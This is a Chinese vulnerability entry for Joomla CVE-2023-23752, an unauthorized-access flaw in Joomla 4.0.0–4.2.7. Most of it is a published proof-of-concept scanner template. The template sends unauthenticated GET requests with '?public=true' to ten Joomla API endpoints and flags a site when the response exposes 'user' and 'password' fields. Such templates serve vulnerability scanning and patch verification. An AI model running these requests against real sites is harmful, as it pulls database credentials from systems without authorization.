漏洞描述
Joomla中存在未授权访问漏洞,由于对Web服务端点的访问限制不当,远程攻击者可以绕过安全限制获得Web应用程序敏感信息。
影响版本4.0.0 <= Joomla <= 4.2.7
CVE-2023-23752: Joomla未授权访问漏洞(CVE-2023-23752)
PoC代码[已公开]
id: CVE-2023-23752
info:
name: Joomla未授权访问漏洞(CVE-2023-23752)
author: daffainfo、m4sk
severity: critical
verified: true
description: |
Joomla中存在未授权访问漏洞,由于对Web服务端点的访问限制不当,远程攻击者可以绕过安全限制获得Web应用程序敏感信息。
影响版本4.0.0 <= Joomla <= 4.2.7
reference:
- https://mp.weixin.qq.com/s/lTdq3-cVTQcSJ3c6G7rn-Q
- https://cve.report/CVE-2023-23752
- https://xz.aliyun.com/t/12175
- https://github.com/Saboor-Hakimi/CVE-2023-23752
rules:
r0:
request:
method: GET
path: /api/index.php/v1/config/application?public=true
headers:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
Connection: close
expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
r1:
request:
method: GET
path: /api/index.php/v1/banners?public=true
headers:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
Connection: close
expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
r2:
request:
method: GET
path: /api/index.php/v1/banners/clients?public=true
headers:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
Connection: close
expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
r3:
request:
method: GET
path: /api/index.php/v1/banners/categories?public=true
headers:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
Connection: close
expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
r4:
request:
method: GET
path: /api/index.php/v1/contacts?public=true
headers:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
Connection: close
expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
r5:
request:
method: GET
path: /api/index.php/v1/contacts/categories?public=true
headers:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
Connection: close
expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
r6:
request:
method: GET
path: /api/index.php/v1/fields/contacts/contact?public=true
headers:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
Connection: close
expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
r7:
request:
method: GET
path: /api/index.php/v1/fields/contacts/mail?public=true
headers:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
Connection: close
expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
r8:
request:
method: GET
path: /api/index.php/v1/fields/contacts/categories?public=true
headers:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
Connection: close
expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
r9:
request:
method: GET
path: /api/index.php/v1/fields/groups/contacts/contact?public=true
headers:
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ee60d1d99382ce00b2fc0b55e5c1975b=vl0pucs0a5jqojs89o82vn4mv3
Connection: close
expression: response.status == 200 && response.body.bcontains(b'links') && response.body.bcontains(b'"password":') && response.body.bcontains(b'attributes') && response.body.bcontains(b'"user":')
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9()